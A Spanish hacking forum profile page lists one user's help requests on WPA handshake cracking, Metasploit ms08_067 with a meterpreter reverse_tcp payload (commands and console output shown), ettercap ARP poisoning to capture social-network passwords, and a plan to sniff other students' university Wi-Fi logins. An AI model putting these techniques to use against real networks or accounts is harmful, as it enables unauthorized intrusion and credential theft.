Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Jonnhy Ripper

#1
Hacking Wireless / Problema Handshakes
23 Septiembre 2014, 13:53 PM
Hola, buenas a todos
Resulta que el aircrack me dice que la contraseña no se encuentra en el diccionario generado por wpamagickey para mi red WLAN_XXXX. No se por que puede ser, quizás porque el handshake este corrupto según he leído en algún sitio, ¿como puedo conseguir un handshake autentico?
Mi router es del año 2013 de Movistar y marca Comtrend.
Puede ser porque tengo mi movil conectado a la red?

PD: Es mejor el método de wps para acceder a este tipo de redes?

Muchas gracias y perdón si el tema esta resuelto pero no lo he encontrado en el buscador del foro ni en google.
#2
Bugs y Exploits / Ayuda con Metasploit (Dudas)
21 Julio 2011, 01:14 AM
No consigo una sesion meterpreter usando el exploit windows smb ms08_067_netapi, he intentado con algunos otros pero nada, alguien me puede decir como consigo una??, el ordenador al que intento acceder tiene sistema operativo windows 7, aunque le quite el antivirus y el firewall no consigo ninguna sesion!! ayuda por favor!

Nota: uso la suite de Backtrack 4
Tambien he intentado con el autopwn de FastTrack y nada

Otra dudas:
1- Cuando hago el analisis de vulnerabilidadees con nmap, me salen los puertos abiertos, a partir de ahi, como sé los bugs, y de saberlos como se que exploit usar?

2- Que formas hay de conseguir sesiones meterpreter?

3- Un exploit sirve solo para conseguir una sesion meterpreter?

PD: Perdonad si mis dudas son muy basicas pero he intentado leer lo mas posible y no he encontrado solucion a mis respuestas

Muchas gracias
#3
Hacking / Meterpreter no me quiere
9 Noviembre 2010, 20:14 PM
Tengo el livecd de backtrack 4 R1 y cuando lanzo desde msf (version 3.3 creo) el exploit windows smb ms08_067_netapi  al puerto 445 y con el payload reverse_tcp me pone que lo ha explotado correctamente pero sin ninguna sesion de meterpreter... lo he estado buscando en muchisimos foros y hay bastante gente que tiene el mismo problema que yo pero no he encontrado una respuesta... ayuda por favor!

(Nota: el autopwn y el fasttrack tampoco me funcionan me sale lo de "waiting on # modules to finish execution")

Los comandos que utilizo son los siguientes:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit (ms08_067_netapi) >

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp


msf exploit(ms08_067_netapi) > show options ------> configuro RHOST en el exploit y LHOST en el payload

msf exploit(ms08_067_netapi) > exploit

  • Started reverse handler on 192.168.1.2:4444
  • Automatically detecting the target...
  • Fingerprint: Windows XP Service Pack 2 - lang:Spanish
  • Selected Target: Windows XP SP2 Spanish (NX)
  • Triggering the vulnerability...
  • Exploit completed, but no session was created.

#4
Hacking / Ettercap y Tuenti
11 Octubre 2010, 23:38 PM
Buenas, por que cuando hago arp poisoning (habiendo modificado el /etc/etter.conf para que acepte ssl) no me captura la contraseña del tuenti?
me sale lo de aceptar el certificado pero no me captura ni el login ni la contraseña en el ettercap
En cambio me funciona perfectamente para facebook, gmail, hotmail y youtube...

Por cierto, por que no me detecta la password cuando hago el login en esta pagina!?? solo me salen asteriscos!!!!!!

Gracias!
#5
Hacking Wireless / Wifi Universidad
11 Octubre 2010, 20:37 PM
Buenas a todos, os comento llevo varios dias comiendome la cabeza con este tema, el caso es que mi universidad tiene wifi pero claro tiene gateway y para acceder necesito nombre de usuario y contraseña, resulta que estos datos te los dan cuando pides el carnet de universitario, y como no me lo han dado todavia
( debo ser el unico de toda la carrera que todavia tiene el provisional ) queria acceder a la red wifi de otra forma.

Para esto se me ocurrio la siguiente forma aunque no se si sera viable:
me conecto a la red wifi y hago sniffing con ettercap hasta que se conecte alguien y pueda acceder provisionalmente al servicio de internet con sus datos

mis dudas ( si esto se puede hacer ) serian:
-se puede hacer este tipo de sniffing con ettercap, es decir, es como sniffing ssl o https?
-hay cuentas de acceso de administradores en este tipo de redes? que pueden hacer?

Gracias de antemano